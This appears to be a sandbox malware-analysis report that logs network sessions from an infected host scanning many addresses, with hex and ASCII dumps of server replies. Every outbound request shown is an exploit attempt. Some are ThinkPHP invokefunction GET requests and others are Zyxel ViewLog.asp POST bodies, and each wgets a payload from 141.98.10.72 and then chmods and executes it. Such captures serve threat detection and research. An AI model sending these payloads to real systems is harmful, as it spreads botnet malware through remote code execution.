                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1267192.168.2.1458228112.30.175.9280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:52.477392912 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1268192.168.2.1437398112.161.31.6580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:52.750731945 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:53.023777008 CET47INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1269192.168.2.1434834112.157.13.15180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:52.789686918 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:53.102214098 CET512INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 17:35:43 GMT
                                                        Server: lighttpd/1.4.55
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1270192.168.2.1452494112.197.247.9080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:52.826556921 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:53.177987099 CET339INHTTP/1.0 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 15:35:52 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1271192.168.2.1434442112.172.109.2980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:54.467878103 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1272192.168.2.145369231.136.222.1338080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:54.934432030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:58.050069094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:04.193676949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:16.225297928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1273192.168.2.145777462.96.39.1168080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:54.934483051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:58.049935102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1274192.168.2.144685631.136.13.2408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:54.944104910 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:58.049953938 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:04.193671942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:16.225188017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1275192.168.2.145780694.122.233.1368080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:54.969106913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1276192.168.2.145440294.123.84.298080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:54.969881058 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1277192.168.2.143611694.120.110.2158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:54.971543074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1278192.168.2.144972095.0.173.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:54.977885008 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:55.234343052 CET958INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 774
                                                        Date: Wed, 14 Feb 2024 08:35:53 GMT
                                                        Keep-Alive: timeout=20
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 33 36 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;cgi-bin&#47;ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.36</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1279192.168.2.1435602112.82.241.580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.068841934 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:55.385940075 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:35:54 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1280192.168.2.1443816112.104.90.24980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.083724022 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:55.417918921 CET113INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Content-Type: text/plain
                                                        Transfer-Encoding: chunked
                                                        Feb 14, 2024 09:35:55.417995930 CET33INData Raw: 42 0d 0a 42 61 64 20 52 65 71 75 65 73 74 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: BBad Request0


                                                        Session IDSource IPSource PortDestination IPDestination Port
